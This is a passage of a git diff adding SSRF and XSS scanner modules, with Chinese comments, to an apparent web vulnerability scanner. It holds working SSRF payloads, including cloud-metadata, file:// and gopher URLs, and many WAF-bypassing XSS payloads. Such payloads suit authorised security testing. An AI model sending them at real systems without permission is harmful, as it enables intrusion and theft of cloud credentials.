+            "Column.*?not found",
+            "Table.*?not found",
+            "expects parameter",
+            "Data type mismatch",
+            "expects parameter",
+            "Internal Server Error",
+            "Server Error in.*?Application",
+            "CLI Driver",
+            "ADODB",
+            "ADOConnection",
+            "MySQLSyntaxErrorException",
+            "SqliteException",
+            "InvalidSqlException",
+            "SQL statement was not properly terminated"
+        ]
+        
+        for pattern in error_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/ssrf_scanner.py b/xss_scanner/scanners/ssrf_scanner.py
new file mode 100644
index 0000000..a8d6d29
--- /dev/null
+++ b/xss_scanner/scanners/ssrf_scanner.py
@@ -0,0 +1,351 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+SSRF（服务器端请求伪造）扫描器模块，负责扫描SSRF漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import uuid
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+
+logger = logging.getLogger('xss_scanner')
+
+class SSRFScanner:
+    """SSRF扫描器类，负责扫描服务器端请求伪造漏洞"""
+    
+    def __init__(self, http_client):
+        """
+        初始化SSRF扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        
+        # 生成唯一标识符，用于检测SSRF漏洞
+        self.ssrf_id = str(uuid.uuid4()).replace('-', '')[:16]
+        
+        # SSRF检测域名
+        # 注意：在实际使用中，应该使用攻击者控制的服务器
+        # 这里提供的域名仅用于演示目的，需要替换为实际的回调服务器
+        self.callback_domain = f"https://ssrf-check.example.com/{self.ssrf_id}"
+        self.burp_collaborator = f"http://{self.ssrf_id}.burpcollaborator.net"
+        self.interact_domain = f"http://{self.ssrf_id}.interact.sh"
+        
+        # SSRF检测Payload
+        self.payloads = [
+            # 基本检测
+            self.callback_domain,
+            self.burp_collaborator,
+            self.interact_domain,
+            
+            # IP形式
+            "http://127.0.0.1",
+            "http://localhost",
+            "http://[::1]",
+            "http://0.0.0.0",
+            "http://0177.0000.0000.0001",  # 127.0.0.1的八进制表示
+            "http://2130706433",  # 127.0.0.1的整数表示
+            "http://0x7f.0x0.0x0.0x1",  # 127.0.0.1的十六进制表示
+            
+            # 内网 IP 范围
+            "http://10.0.0.1",
+            "http://172.16.0.1",
+            "http://192.168.0.1",
+            "http://169.254.169.254",  # AWS元数据
+            "http://metadata.google.internal",  # GCP元数据
+            
+            # 不同端口
+            "http://127.0.0.1:22",  # SSH
+            "http://127.0.0.1:3306",  # MySQL
+            "http://127.0.0.1:5432",  # PostgreSQL
+            "http://127.0.0.1:6379",  # Redis
+            "http://127.0.0.1:9200",  # Elasticsearch
+            "http://127.0.0.1:8080",  # 常见Web端口
+            
+            # 不同协议
+            "https://127.0.0.1",
+            "ftp://127.0.0.1",
+            "gopher://127.0.0.1:25/",  # SMTP
+            "file:///etc/passwd",
+            "dict://127.0.0.1:6379/info",  # Redis
+            
+            # 平台相关
+            "http://169.254.169.254/latest/meta-data/",  # AWS
+            "http://metadata.google.internal/computeMetadata/v1/",  # GCP
+            "http://169.254.169.254/metadata/v1/",  # DigitalOcean
+            "http://169.254.169.254/metadata",  # Azure
+            
+            # URL编码绕过
+            "http://%31%32%37%2e%30%2e%30%2e%31",  # 127.0.0.1
+            "http://127.0.0.1%23@example.com",  # 使用URL片段
+            "http://127.0.0.1%2f@example.com",  # 使用斜杠
+            
+            # DNS重绑定攻击
+            f"http://{self.ssrf_id}.example.com",  # 会解析到内网IP
+            
+            # 使用用户名密码形式
+            "http://user:pass@127.0.0.1",
+            
+            # 空字节绕过 (适用于某些语言)
+            "http://127.0.0.1%00",
+            
+            # 使用域名 + 解析到内部IP的域名
+            "http://spoofed.burpcollaborator.net",
+            
+            # 利用重定向的SSRF
+            "http://redirector.example.com/?url=http://127.0.0.1"
+        ]
+        
+        # 可能的SSRF成功特征
+        self.success_patterns = [
+            # 服务器响应特征
+            "ssh-[0-9].[0-9]", # SSH banner
+            "mysql", # MySQL
+            "postgresql", # PostgreSQL
+            "redis_version", # Redis
+            "elastic", # Elasticsearch
+            "instance-id", # AWS metadata
+            "metadata", # Cloud metadata
+            "computeMetadata", # GCP metadata
+            
+            # 常见HTTP回显内容
+            "<!DOCTYPE html>",
+            "<html",
+            "<head",
+            "<body",
+            
+            # 系统文件特征
+            "root:.*:0:0:",
+            "bin:.*:1:1:",
+            
+            # 错误消息特征
+            "Connection refused",
+            "No route to host",
+            "Name or service not known",
+            "Network is unreachable",
+            
+            # 特定应用程序的特征
+            "Apache",
+            "nginx",
+            "IIS",
+            "Express",
+            "Tomcat",
+            
+            # HTTP头
+            "X-Powered-By:",
+            "Server:",
+            
+            # 自定义回调标记
+            self.ssrf_id
+        ]
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        # 可能存在SSRF的字段名称
+        ssrf_prone_fields = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果字段名不包含敏感关键词，则跳过扫描
+        field_name_lower = field['name'].lower()
+        if not any(keyword in field_name_lower for keyword in ssrf_prone_fields):
+            return None
+            
+        logger.debug(f"扫描SSRF: {field['name']} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建表单数据
+            form_data = {}
+            
+            # 填充所有字段
+            for f in form.get('fields', []):
+                if f.get('name'):
+                    # 如果是目标字段，则使用Payload
+                    if f['name'] == field['name']:
+                        form_data[f['name']] = payload
+                    else:
+                        # 否则使用默认值
+                        form_data[f['name']] = f.get('value', '')
+            
+            # 发送请求
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                if method == 'POST':
+                    response = self.http_client.post(action_url, data=form_data)
+                else:
+                    response = self.http_client.get(action_url, params=form_data)
+                    
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'form_action': action_url,
+                        'form_method': method,
+                        'parameter': field['name'],
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在表单字段'{field['name']}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"表单提交到{action_url}的{field['name']}字段存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF时发生错误: {str(e)}")
+                
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的SSRF漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        # 可能存在SSRF的参数名称
+        ssrf_prone_params = [
+            'url', 'uri', 'link', 'host', 'ip', 'address', 'target', 'site',
+            'website', 'web', 'src', 'source', 'dest', 'destination', 'redirect',
+            'redirect_to', 'redirect_url', 'callback', 'api', 'endpoint',
+            'webhook', 'proxy', 'fetch', 'resource', 'feed', 'service',
+            'location', 'remote', 'forward', 'next', 'continue', 'return',
+            'return_url', 'continue_url', 'next_url', 'request'
+        ]
+        
+        # 如果参数名不包含敏感关键词，则跳过扫描
+        param_lower = param.lower()
+        if not any(keyword in param_lower for keyword in ssrf_prone_params):
+            return None
+            
+        logger.debug(f"扫描SSRF参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 检测SSRF漏洞
+        for payload in self.payloads:
+            # 构建注入参数
+            inject_params = query_params.copy()
+            inject_params[param] = payload
+            
+            # 构建测试URL
+            query_string = urlencode(inject_params)
+            test_url = f"{base_url}?{query_string}"
+            
+            try:
+                logger.debug(f"测试Payload: {payload}")
+                
+                # 发送请求
+                response = self.http_client.get(test_url)
+                if not response:
+                    continue
+                    
+                # 检查响应中是否包含成功特征
+                if self._check_ssrf_success(response.text):
+                    return {
+                        'type': 'SSRF',
+                        'url': url,
+                        'parameter': param,
+                        'payload': payload,
+                        'severity': '高',
+                        'description': f"在URL参数'{param}'中发现服务器端请求伪造(SSRF)漏洞",
+                        'details': f"URL参数{param}存在SSRF漏洞，可以访问内部网络资源",
+                        'recommendation': "实施URL白名单，使用间接引用，禁止访问内部网络资源，限制响应大小和类型"
+                    }
+                    
+                # 在实际环境中，还需要检查回调服务器是否收到了请求
+                # 由于这是模拟环境，该步骤被省略
+            except Exception as e:
+                logger.error(f"扫描SSRF参数时发生错误: {str(e)}")
+                
+        return None
+    
+    def _check_ssrf_success(self, content):
+        """
+        检查响应内容中是否包含SSRF成功的特征
+        
+        Args:
+            content: 响应内容
+            
+        Returns:
+            bool: 是否包含SSRF成功特征
+        """
+        if not content:
+            return False
+            
+        # 检查成功特征
+        for pattern in self.success_patterns:
+            if re.search(pattern, content, re.IGNORECASE):
+                return True
+                
+        return False
+    
+    def check_callback_server(self):
+        """
+        检查回调服务器是否收到请求（在实际环境中实现）
+        
+        Returns:
+            bool: 是否收到回调请求
+        """
+        # 此功能在实际环境中需要实现
+        # 这里只是一个占位函数
+        return False
+    
+    def can_scan_form(self):
+        """是否可以扫描表单"""
+        return True
+    
+    def can_scan_params(self):
+        """是否可以扫描URL参数"""
+        return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/xss_scanner.py b/xss_scanner/scanners/xss_scanner.py
new file mode 100644
index 0000000..2fd672a
--- /dev/null
+++ b/xss_scanner/scanners/xss_scanner.py
@@ -0,0 +1,1330 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS扫描器模块，负责扫描XSS漏洞
+"""
+
+import re
+import logging
+import random
+import string
+import time
+import base64
+from urllib.parse import urlparse, urlencode, parse_qsl, unquote
+from bs4 import BeautifulSoup
+
+try:
+    from selenium import webdriver
+    from selenium.webdriver.chrome.options import Options
+    from selenium.common.exceptions import TimeoutException, WebDriverException
+    SELENIUM_AVAILABLE = True
+except ImportError:
+    SELENIUM_AVAILABLE = False
+
+from xss_scanner.utils.tech_detector import TechDetector
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSScanner:
+    """XSS扫描器类，负责扫描XSS漏洞"""
+    
+    def __init__(self, http_client, payload_level=2, use_browser=False):
+        """
+        初始化XSS扫描器
+        
+        Args:
+            http_client: HTTP客户端对象
+            payload_level: Payload复杂度级别，1-基础，2-标准，3-高级
+            use_browser: 是否使用真实浏览器检测
+        """
+        self.http_client = http_client
+        self.payload_level = payload_level
+        self.use_browser = use_browser and SELENIUM_AVAILABLE
+        self.driver = None
+        
+        # 初始化技术检测器
+        self.tech_detector = TechDetector()
+        
+        # 存储检测到的技术信息
+        self.tech_info = {
+            'frontend': [],
+            'backend': [],
+            'server': [],
+            'waf': []
+        }
+        
+        # 初始化浏览器
+        if self.use_browser:
+            self._init_browser()
+            
+        # 随机生成的标记，用于检测XSS漏洞
+        self.xss_mark = self._generate_random_string(8)
+        
+        # 加载XSS Payload
+        self.payloads = self._load_payloads()
+        
+        # 加载WAF绕过Payload
+        self.waf_bypass_payloads = self._load_payloads_from_file('xss_waf_bypass.txt')
+    
+    def _init_browser(self):
+        """初始化浏览器"""
+        if not SELENIUM_AVAILABLE:
+            logger.warning("未安装Selenium，无法使用浏览器功能")
+            self.use_browser = False
+            return
+            
+        try:
+            chrome_options = Options()
+            chrome_options.add_argument('--headless')
+            chrome_options.add_argument('--disable-gpu')
+            chrome_options.add_argument('--no-sandbox')
+            chrome_options.add_argument('--disable-dev-shm-usage')
+            chrome_options.add_argument('--disable-extensions')
+            chrome_options.add_argument('--disable-notifications')
+            
+            self.driver = webdriver.Chrome(options=chrome_options)
+            self.driver.set_page_load_timeout(10)
+            logger.info("浏览器初始化成功")
+        except Exception as e:
+            logger.error(f"浏览器初始化失败: {str(e)}")
+            self.use_browser = False
+    
+    def _load_payloads(self):
+        """
+        加载XSS Payload
+        
+        Returns:
+            list: XSS Payload列表
+        """
+        # 尝试从文件加载Payload
+        filename = f"xss_level{self.payload_level}.txt"
+        file_payloads = self._load_payloads_from_file(filename)
+        
+        if file_payloads:
+            return file_payloads
+        
+        # 如果文件加载失败，则使用内置的Payload
+        # 基础XSS Payload，适用于所有场景
+        basic_payloads = [
+            f"<script>alert('{self.xss_mark}')</script>",
+            f"<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<svg onload=alert('{self.xss_mark}')>",
+            f"<body onload=alert('{self.xss_mark}')>",
+            f"<iframe onload=alert('{self.xss_mark}')></iframe>",
+            f"javascript:alert('{self.xss_mark}')",
+            f"<input autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<select autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<textarea autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<keygen autofocus onfocus=alert('{self.xss_mark}')>",
+            f"<video><source onerror=alert('{self.xss_mark}')>",
+            f"<audio src=x onerror=alert('{self.xss_mark}')>",
+            f"><script>alert('{self.xss_mark}')</script>",
+            f"\"><script>alert('{self.xss_mark}')</script>",
+            f"'><script>alert('{self.xss_mark}')</script>",
+            f"><img src=x onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 标准XSS Payload，用于绕过简单的防护
+        standard_payloads = [
+            f"<script>alert(String.fromCharCode(88,83,83,77,65,82,75))</script>".replace("XSSMARK", self.xss_mark),
+            f"<img src=x oneonerrorrror=alert('{self.xss_mark}')>",
+            f"<sCRipT>alert('{self.xss_mark}')</sCriPt>",
+            f"<script/x>alert('{self.xss_mark}')</script>",
+            f"<script ~~~>alert('{self.xss_mark}')</script ~~~>",
+            f"<script>setTimeout('alert(\\'{self.xss_mark}\\')',0)</script>",
+            f"<svg/onload=alert('{self.xss_mark}')>",
+            f"<svg><script>alert('{self.xss_mark}')</script>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x dur=1s>",
+            f"<svg><a><animate attributeName=href values=javascript:alert('{self.xss_mark}') /><text x=20 y=20>Click Me</text></a>",
+            f"<svg><script xlink:href=data:,alert('{self.xss_mark}') />",
+            f"<math><maction actiontype=statusline xlink:href=javascript:alert('{self.xss_mark}')>Click</maction></math>",
+            f"<iframe src=javascript:alert('{self.xss_mark}')></iframe>",
+            f"<object data=javascript:alert('{self.xss_mark}')></object>",
+            f"<embed src=javascript:alert('{self.xss_mark}')></embed>",
+            f"<link rel=import href=data:text/html;base64,{base64.b64encode(f'<script>alert(\'{self.xss_mark}\')</script>'.encode()).decode()}>",
+            f"<x contenteditable onblur=alert('{self.xss_mark}')>lose focus!</x>",
+            f"<style>@keyframes x{{}}*{{}}50%{{background:url('javascript:alert(\"{self.xss_mark}\")')}}</style><div style=animation-name:x>",
+            f"<sVg OnLoAd=alert('{self.xss_mark}')>",
+            f"<img src=`x`onerror=alert('{self.xss_mark}')>",
+            f"<img src='x'onerror=alert('{self.xss_mark}')>",
+            f"<img src=\"x\"onerror=alert('{self.xss_mark}')>"
+        ]
+        
+        # 高级XSS Payload，用于绕过复杂的防护
+        advanced_payloads = [
+            f"<script>eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))</script>",
+            f"<script>setTimeout(()=>{{eval(atob('{base64.b64encode(f'alert(\'{self.xss_mark}\')'.encode()).decode()}'))}})</script>",
+            f"<script>eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x27{self.xss_mark}\\x27\\x29')</script>",
+            f"<script>window['al'+'ert']('{self.xss_mark}')</script>",
+            f"<script>var a='al',b='ert';window[a+b]('{self.xss_mark}')</script>",
+            f"<svg><script>123<1>alert('{self.xss_mark}')</script>",
+            f"<svg><script>{{\\n}}alert('{self.xss_mark}')</script>",
+            f"<a href=javascript&colon;alert&lpar;'{self.xss_mark}'&rpar;>Click</a>",
+            f"<svg><animate onbegin=alert('{self.xss_mark}') attributeName=x></svg>",
+            f"<div style=width:1000px;overflow:hidden;>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<img src=x onerror=alert('{self.xss_mark}')>",
+            f"<img src=1 onerror=alert({self._to_js_string(self.xss_mark)})>",
+            f"<script>onerror=alert;throw'{self.xss_mark}';</script>",
+            f"<script>[].filter.call(1,alert,'{self.xss_mark}')</script>",
+            f"<script>Object.defineProperties(window, {{get onerror(){{return {{handleEvent: function(){{alert('{self.xss_mark}');}}}};}}}});throw 'test';</script>",
+            f"<script>({{}}).constructor.constructor('alert(\\'{self.xss_mark}\\')')();</script>",
+            f"<script>String.prototype.replace.call('xss','ss',(_,__)=>eval('aler'+'t(`{self.xss_mark}`)'))</script>",
+            f"<script>location='javascript:alert(\\'{self.xss_mark}\\');</script>",
+            f"<iframe srcdoc=\"<script>parent.alert('{self.xss_mark}')</script>\"></iframe>",
+            f"<script>[]['\\\140cons\\\140'+'tru\\\143tor']('\\\141\\\154\\\145\\\162\\\164\\\50\\\47{self.xss_mark}\\\47\\\51')();</script>",
+            f"<form id='xss'><input name='action' value='alert(\"{self.xss_mark}\")'></form><svg><use href='#xss' /></svg>",
+            f"<img src=x:alert('{self.xss_mark}') onerror=eval(src)>",
+            f"<script src='data:text/javascript,alert(\"{self.xss_mark}\")'></script>",
+            f"<object data='data:text/html;base64,{base64.b64encode(f"<script>alert('{self.xss_mark}')</script>".encode()).decode()}'></object>",
+            f"<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert('{self.xss_mark}')\">",
+            f"<iframe src=\"javascript:alert('{self.xss_mark}')\"></iframe>",
+            f"<form><button formaction=javascript:alert('{self.xss_mark}')>click</button></form>"
+        ]
+        
+        # 根据Payload级别返回对应的Payload列表
+        if self.payload_level == 1:
+            return basic_payloads
+        elif self.payload_level == 2:
+            return basic_payloads + standard_payloads
+        else:
+            return basic_payloads + standard_payloads + advanced_payloads
+    
+    def _load_payloads_from_file(self, filename, default_payloads=None):
+        """
+        从文件中加载Payload
+        
+        Args:
+            filename: Payload文件名
+            default_payloads: 默认Payload列表
+            
+        Returns:
+            list: Payload列表
+        """
+        import os
+        
+        # 获取当前模块所在目录
+        current_dir = os.path.dirname(os.path.abspath(__file__))
+        
+        # 构建Payload文件路径
+        payloads_dir = os.path.join(os.path.dirname(os.path.dirname(current_dir)), 'payloads', 'xss')
+        
+        # 如果目录不存在，则创建
+        if not os.path.exists(payloads_dir):
+            try:
+                os.makedirs(payloads_dir)
+            except Exception as e:
+                logger.error(f"创建Payload目录失败: {str(e)}")
+                return default_payloads
+        
+        payload_file = os.path.join(payloads_dir, filename)
+        
+        # 如果文件不存在，则返回默认Payload
+        if not os.path.exists(payload_file):
+            logger.warning(f"Payload文件不存在: {payload_file}")
+            return default_payloads
+        
+        try:
+            # 读取Payload文件
+            payloads = []
+            with open(payload_file, 'r', encoding='utf-8') as f:
+                for line in f:
+                    line = line.strip()
+                    # 忽略空行和注释
+                    if not line or line.startswith('#'):
+                        continue
+                    # 替换Payload中的占位符
+                    line = line.replace('XSS_MARK', self.xss_mark)
+                    line = line.replace('XSSMARK', self.xss_mark)
+                    line = line.replace('1', self.xss_mark)
+                    payloads.append(line)
+            
+            logger.info(f"从{payload_file}加载了{len(payloads)}个Payload")
+            return payloads
+        except Exception as e:
+            logger.error(f"加载Payload文件失败: {str(e)}")
+            return default_payloads
+    
+    def scan_form(self, url, form, field):
+        """
+        扫描表单中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+            field: 字段信息
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not field.get('name'):
+            return None
+            
+        logger.debug(f"扫描表单字段: {field.get('name')} @ {url}")
+        
+        # 获取表单提交URL
+        action_url = form['action'] if form['action'] else url
+        
+        # 获取表单方法
+        method = form['method'].upper()
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 生成唯一的XSS标记
+        original_xss_mark = self.xss_mark
+        self.xss_mark = self._generate_random_string()
+        
+        # 首先发送一个测试请求，用于检测XSS注入点的上下文
+        test_form_data = {}
+        for f in form.get('fields', []):
+            if f.get('name'):
+                if f['name'] == field['name']:
+                    test_form_data[f['name']] = f"XSS_CONTEXT_TEST_{self.xss_mark}"
+                else:
+                    test_form_data[f['name']] = f.get('value', '')
+        
+        # 发送测试请求
+        try:
+            if method == 'POST':
+                test_response = self.http_client.post(action_url, data=test_form_data)
+            else:
+                test_response = self.http_client.get(action_url, params=test_form_data)
+                
+            # 检测XSS注入点的上下文
+            context = self._detect_context(test_response, f"XSS_CONTEXT_TEST_{self.xss_mark}")
+            logger.info(f"检测到XSS注入点上下文: {context}")
+            
+            # 获取针对特定上下文的有效载荷
+            context_payloads = self._get_context_specific_payloads(context)
+            
+            # 获取针对特定WAF的绕过Payload
+            waf_payloads = self._get_waf_bypass_payloads()
+            
+            # 合并标准Payload、上下文特定Payload和WAF绕过Payload
+            all_payloads = self.payloads + context_payloads + waf_payloads
+            
+            # 构建表单数据
+            for payload in all_payloads:
+                form_data = {}
+                
+                # 填充所有字段
+                for f in form.get('fields', []):
+                    if f.get('name'):
+                        # 如果是目标字段，则使用Payload
+                        if f['name'] == field['name']:
+                            form_data[f['name']] = payload
+                        else:
+                            # 否则使用默认值
+                            form_data[f['name']] = f.get('value', '')
+                
+                # 提交表单
+                try:
+                    logger.debug(f"测试Payload: {payload}")
+                    
+                    if method == 'POST':
+                        response = self.http_client.post(action_url, data=form_data)
+                    else:
+                        response = self.http_client.get(action_url, params=form_data)
+                    
+                    # 检查响应中是否存在XSS
+                    if response and self._check_xss_in_response(response, payload):
+                        # 还原原始XSS标记
+                        xss_mark = self.xss_mark
+                        self.xss_mark = original_xss_mark
+                        
+                        return {
+                            'type': 'XSS',
+                            'subtype': 'Reflected XSS',
+                            'url': url,
+                            'form_action': action_url,
+                            'form_method': method,
+                            'parameter': field['name'],
+                            'payload': payload,
+                            'context': context,
+                            'severity': '高',
+                            'description': f"在表单字段'{field['name']}'中发现XSS漏洞",
+                            'details': {
+                                "表单操作": action_url,
+                                "表单方法": method,
+                                "漏洞字段": field['name'],
+                                "有效载荷": payload,
+                                "注入上下文": context,
+                                "技术栈": str(self.tech_info)
+                            },
+                            'recommendation': "过滤用户输入，使用适当的输出编码，实施内容安全策略(CSP)，考虑使用现代框架的XSS保护"
+                        }
+                except Exception as e:
+                    logger.error(f"测试Payload时发生错误: {str(e)}")
+                    
+        except Exception as e:
+            logger.error(f"扫描表单时发生错误: {str(e)}")
+            
+        # 还原原始XSS标记
+        self.xss_mark = original_xss_mark
+        return None
+    
+    def scan_parameter(self, url, param):
+        """
+        扫描URL参数中的XSS漏洞
+        
+        Args:
+            url: 页面URL
+            param: 参数名
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        logger.debug(f"扫描URL参数: {param} @ {url}")
+        
+        # 解析URL
+        parsed_url = urlparse(url)
+        
+        # 获取查询参数
+        query_params = dict(parse_qsl(parsed_url.query))
+        
+        # 如果参数不存在，则添加
+        if param not in query_params:
+            query_params[param] = ""
+            
+        # 构建基础URL
+        base_url = f"{parsed_url.scheme}://{parsed_url.netloc}{parsed_url.path}"
+        
+        # 首先检测目标技术栈
+        self._detect_technology(url)
+        
+        # 生成唯一的XSS标记
+        original_xss_mark = self.xss_mark
+        self.xss_mark = self._generate_random_string()
+        
+        # 首先发送一个测试请求，用于检测XSS注入点的上下文
+        test_params = query_params.copy()
+        test_params[param] = f"XSS_CONTEXT_TEST_{self.xss_mark}"
+        
+        # 发送测试请求
+        try:
+            test_response = self.http_client.get(f"{base_url}?{urlencode(test_params)}")
+            
+            # 检测XSS注入点的上下文
+            context = self._detect_context(test_response, f"XSS_CONTEXT_TEST_{self.xss_mark}")
+            logger.info(f"检测到XSS注入点上下文: {context}")
+            
+            # 获取针对特定上下文的有效载荷
+            context_payloads = self._get_context_specific_payloads(context)
+            
+            # 获取针对特定WAF的绕过Payload
+            waf_payloads = self._get_waf_bypass_payloads()
+            
+            # 合并标准Payload、上下文特定Payload和WAF绕过Payload
+            all_payloads = self.payloads + context_payloads + waf_payloads
+            
+            # 测试每个Payload
+            for payload in all_payloads:
+                try:
+                    # 构建注入参数
+                    inject_params = query_params.copy()
+                    inject_params[param] = payload
+                    
+                    logger.debug(f"测试Payload: {payload}")
+                    
+                    # 发送注入请求
+                    response = self.http_client.get(f"{base_url}?{urlencode(inject_params)}")
+                    
+                    # 检查响应中是否存在XSS
+                    if response and self._check_xss_in_response(response, payload):
+                        # 还原原始XSS标记
+                        xss_mark = self.xss_mark
+                        self.xss_mark = original_xss_mark
+                        
+                        return {
+                            'type': 'XSS',
+                            'subtype': 'Reflected XSS',
+                            'url': url,
+                            'parameter': param,
+                            'payload': payload,
+                            'context': context,
+                            'severity': '高',
+                            'description': f"在URL参数'{param}'中发现XSS漏洞",
+                            'details': {
+                                "URL": url,
+                                "漏洞参数": param,
+                                "有效载荷": payload,
+                                "注入上下文": context,
+                                "技术栈": str(self.tech_info)
+                            },
+                            'recommendation': "过滤用户输入，使用适当的输出编码，实施内容安全策略(CSP)，考虑使用现代框架的XSS保护"
+                        }
+                except Exception as e:
+                    logger.error(f"测试Payload时发生错误: {str(e)}")
+        except Exception as e:
+            logger.error(f"扫描参数时发生错误: {str(e)}")
+            
+        # 还原原始XSS标记
+        self.xss_mark = original_xss_mark
+        return None
+    
+    def scan_dom(self, url):
+        """
+        扫描DOM型XSS漏洞
+        
+        Args:
+            url: 页面URL
+            
+        Returns:
+            dict: 漏洞信息，如果没有发现漏洞则返回None
+        """
+        if not self.use_browser or not self.driver:
+            logger.debug("浏览器未初始化，无法扫描DOM型XSS")
+            return None
+            
+        logger.info(f"扫描DOM型XSS: {url}")
+        
+        # 检测目标技术栈
+        self._detect_technology(url)
+        
+        # DOM XSS常见的危险源和接收器
+        dangerous_sources = [
+            # 网址/位置相关
+            'document.URL', 'document.documentURI', 'document.URLUnencoded', 'document.baseURI',
+            'location', 'location.href', 'location.search', 'location.hash', 'location.pathname',
+            
+            # 存储相关
+            'localStorage', 'sessionStorage', 
+            
+            # 文档/cookie相关
+            'document.cookie', 'document.referrer',
+            
+            # 窗口相关
+            'window.name', 'history.pushState', 'history.replaceState',
+            
+            # 消息传递
+            'postMessage', 'onmessage', 'addEventListener("message"', 
+            
+            # 跨域通信
+            'XMLHttpRequest', 'fetch', 'jQuery.ajax', '$.ajax',
+            
+            # 框架特定
+            'eval', 'setTimeout', 'setInterval', 'Function', 
+            'document.write', 'document.writeln', 'innerHTML', 'outerHTML',
+            'insertAdjacentHTML', 'execScript',
+            
+            # 现代框架源
+            'dangerouslySetInnerHTML', 'v-html', 'ng-bind-html'
+        ]
+        
+        # DOM XSS常见的危险接收器
+        dangerous_sinks = [
+            # HTML操作
+            'innerHTML', 'outerHTML', 'document.write', 'document.writeln', 'insertAdjacentHTML',
+            
+            # JavaScript执行
+            'eval', 'setTimeout', 'setInterval', 'Function', 'execScript',
+            
+            # URL操作
+            'location', 'location.href', 'location.replace', 'location.assign', 'location.pathname',
+            'open', 'element.src', 'postMessage',
+            
+            # 框架特定
+            'dangerouslySetInnerHTML', 'v-html', 'ng-bind-html', 'bypassSecurityTrust'
+        ]
+        
+        # 先尝试检测页面中是否存在可能的DOM XSS
+        try:
+            # 加载页面
+            self.driver.get(url)
+            time.sleep(2)  # 给页面一些加载和执行的时间
+            
+            # 检查页面中是否存在危险的源和接收器
+            vulnerable_sources_found = []
+            vulnerable_sinks_found = []
+            
+            # 使用JavaScript检查危险源和接收器
+            source_sink_check_result = self.driver.execute_script("""
+                var results = {
+                    'sources': [],
+                    'sinks': [],
+                    'source_to_sink': [],
+                    'event_handlers': [],
+                    'url_based_sources': []
+                };
+                
+                // 捕获页面中的JavaScript源代码进行分析
+                var allScripts = document.querySelectorAll('script');
+                var allScriptContents = Array.from(allScripts)
+                    .filter(script => !script.src)  // 仅使用内联脚本
+                    .map(script => script.textContent)
+                    .join('\\n');
+                
+                // 分析源 
+                var sources = arguments[0];
+                for (var i = 0; i < sources.length; i++) {
+                    if (allScriptContents.indexOf(sources[i]) !== -1) {
+                        results.sources.push(sources[i]);
+                    }
+                }
+                
+                // 分析接收器
+                var sinks = arguments[1];
+                for (var i = 0; i < sinks.length; i++) {
+                    if (allScriptContents.indexOf(sinks[i]) !== -1) {
+                        results.sinks.push(sinks[i]);
+                    }
+                }
+                
+                // 检测URL参数可能直接输入到危险接收器
+                try {
+                    var urlParams = new URLSearchParams(window.location.search);
+                    for (var param of urlParams) {
+                        var paramName = param[0];
+                        var paramValue = param[1];
+                        
+                        // 在JavaScript中查找对URL参数的引用
+                        if (allScriptContents.indexOf(paramName) !== -1) {
+                            // 检查是否有参数值直接传入危险接收器
